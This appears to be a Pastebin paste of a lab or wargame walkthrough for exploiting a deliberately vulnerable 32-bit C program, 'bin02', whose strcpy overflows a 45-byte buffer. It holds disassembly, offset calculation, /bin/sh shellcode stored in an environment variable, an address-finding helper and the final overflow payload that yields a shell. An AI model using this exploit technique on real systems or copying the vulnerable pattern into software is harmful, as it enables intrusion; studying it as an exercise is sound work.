Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /////BOF environment variable
- bin02.c
- #include <stdio.h>
- #include <string.h>
- int protect_affiche(char *texte)
- {
- char buffer[45];
- strcpy(buffer, texte);
- printf("%s\n",buffer);
- }
- int main(int argc, char ** argv)
- {
- char interdit[]={0x89,0x90,0x99,0x80,0xc0,0xe1,0xb0,0x00};
- int i,j;
- if (argc!=2)
- {
- printf("Usage: %s <texte>\n", argv[0]);
- return 1;
- }
- for(i=0;argv[1][i];i++)
- {
- for(j=0;interdit[j];j++)
- {
- if(argv[1][i] == interdit[j])
- {
- printf("Detection shellcode !\n");
- return 1;
- }
- }
- }
- protect_affiche(argv[1]);
- return 0;
- }
- gcc -m32 -fno-stack-protector -z execstack in02.c -o bin02
- peda bin02
- disass main
- 0x08048459 <+0>: push ebp
- 0x0804845a <+1>: mov ebp,esp
- 0x0804845c <+3>: and esp,0xfffffff0
- 0x0804845f <+6>: sub esp,0x20
- 0x08048462 <+9>: mov BYTE PTR [esp+0x10],0x89
- 0x08048467 <+14>: mov BYTE PTR [esp+0x11],0x90
- 0x0804846c <+19>: mov BYTE PTR [esp+0x12],0x99
- 0x08048471 <+24>: mov BYTE PTR [esp+0x13],0x80
- 0x08048476 <+29>: mov BYTE PTR [esp+0x14],0xc0
- 0x0804847b <+34>: mov BYTE PTR [esp+0x15],0xe1
- 0x08048480 <+39>: mov BYTE PTR [esp+0x16],0xb0
- 0x08048485 <+44>: mov BYTE PTR [esp+0x17],0x0
- 0x0804848a <+49>: cmp DWORD PTR [ebp+0x8],0x2
- 0x0804848e <+53>: je 0x80484b0 <main+87>
- 0x08048490 <+55>: mov eax,DWORD PTR [ebp+0xc]
- 0x08048493 <+58>: mov edx,DWORD PTR [eax]
- 0x08048495 <+60>: mov eax,0x8048600
- 0x0804849a <+65>: mov DWORD PTR [esp+0x4],edx
- 0x0804849e <+69>: mov DWORD PTR [esp],eax
- 0x080484a1 <+72>: call 0x8048354 <printf@plt>
- 0x080484a6 <+77>: mov eax,0x1
- 0x080484ab <+82>: jmp 0x8048538 <main+223>
- 0x080484b0 <+87>: mov DWORD PTR [esp+0x18],0x0
- 0x080484b8 <+95>: jmp 0x804850d <main+180>
- 0x080484ba <+97>: mov DWORD PTR [esp+0x1c],0x0
- 0x080484c2 <+105>: jmp 0x80484fb <main+162>
- 0x080484c4 <+107>: mov eax,DWORD PTR [ebp+0xc]
- 0x080484c7 <+110>: add eax,0x4
- 0x080484ca <+113>: mov edx,DWORD PTR [eax]
- 0x080484cc <+115>: mov eax,DWORD PTR [esp+0x18]
- 0x080484d0 <+119>: lea eax,[edx+eax*1]
- 0x080484d3 <+122>: movzx edx,BYTE PTR [eax]
- 0x080484d6 <+125>: mov eax,DWORD PTR [esp+0x1c]
- 0x080484da <+129>: movzx eax,BYTE PTR [esp+eax*1+0x10]
- 0x080484df <+134>: cmp dl,al
- 0x080484e1 <+136>: jne 0x80484f6 <main+157>
- 0x080484e3 <+138>: mov DWORD PTR [esp],0x8048613
- 0x080484ea <+145>: call 0x8048364 <puts@plt>
- 0x080484ef <+150>: mov eax,0x1
- 0x080484f4 <+155>: jmp 0x8048538 <main+223>
- 0x080484f6 <+157>: add DWORD PTR [esp+0x1c],0x1
- 0x080484fb <+162>: mov eax,DWORD PTR [esp+0x1c]
- 0x080484ff <+166>: movzx eax,BYTE PTR [esp+eax*1+0x10]
- 0x08048504 <+171>: test al,al
- 0x08048506 <+173>: jne 0x80484c4 <main+107>
- 0x08048508 <+175>: add DWORD PTR [esp+0x18],0x1
- 0x0804850d <+180>: mov eax,DWORD PTR [ebp+0xc]
- 0x08048510 <+183>: add eax,0x4
- 0x08048513 <+186>: mov edx,DWORD PTR [eax]
- 0x08048515 <+188>: mov eax,DWORD PTR [esp+0x18]
- 0x08048519 <+192>: lea eax,[edx+eax*1]
- 0x0804851c <+195>: movzx eax,BYTE PTR [eax]
- 0x0804851f <+198>: test al,al
- 0x08048521 <+200>: jne 0x80484ba <main+97>
- 0x08048523 <+202>: mov eax,DWORD PTR [ebp+0xc]
- 0x08048526 <+205>: add eax,0x4
- 0x08048529 <+208>: mov eax,DWORD PTR [eax]
- 0x0804852b <+210>: mov DWORD PTR [esp],eax
- 0x0804852e <+213>: call 0x8048434 <protect_affiche>
- 0x08048533 <+218>: mov eax,0x0
- 0x08048538 <+223>: leave
- 0x08048539 <+224>: ret
- disass protect_affiche
- 0x08048434 <+0>: push ebp
- 0x08048435 <+1>: mov ebp,esp
- 0x08048437 <+3>: sub esp,0x48
- 0x0804843a <+6>: mov eax,DWORD PTR [ebp+0x8]
- 0x0804843d <+9>: mov DWORD PTR [esp+0x4],eax
- 0x08048441 <+13>: lea eax,[ebp-0x35]
- 0x08048444 <+16>: mov DWORD PTR [esp],eax
- 0x08048447 <+19>: call 0x8048344 <strcpy@plt>
- 0x0804844c <+24>: lea eax,[ebp-0x35]
- 0x0804844f <+27>: mov DWORD PTR [esp],eax
- 0x08048452 <+30>: call 0x8048364 <puts@plt>
- 0x08048457 <+35>: leave
- 0x08048458 <+36>: ret
- b *0x08048434
- b *0x08048447
- r toto
- x/wx $esp
- 0xbffffbfc: 0x08048533
- c
- dumpargs
- Guessed arguments:
- arg[0]: 0xbffffbc3 --> 0xfffbf6b7
- arg[1]: 0xbffffe0d ("toto")
- p/d 0xbffffbfc-0xbffffbc3
- $1 = 57
- q
- export SHELLCODE=$(python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"')
- nano getenvvar.c
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- int main(int argc, char *argv[]) {
- char *ptr;
- if(argc < 3) {
- printf("Usage: %s <environment variable> <target name program>\n", argv[0]);
- exit(EXIT_FAILURE);
- }
- ptr = getenv(argv[1]); /* get env var location */
- ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
- printf("%s will be at %p\n", argv[1], ptr);
- return EXIT_SUCCESS;
- }
- gcc -m32 getenvvar.c -o getenvvar
- ./getenvvar SHELLCODE bin02
- SHELLCODE will be at 0xbffffe1f
- ./bin02 $(python -c 'print "A"*57 + "\x1f\xfe\xff\xbf"')
- AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA#▒▒▒
- $
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement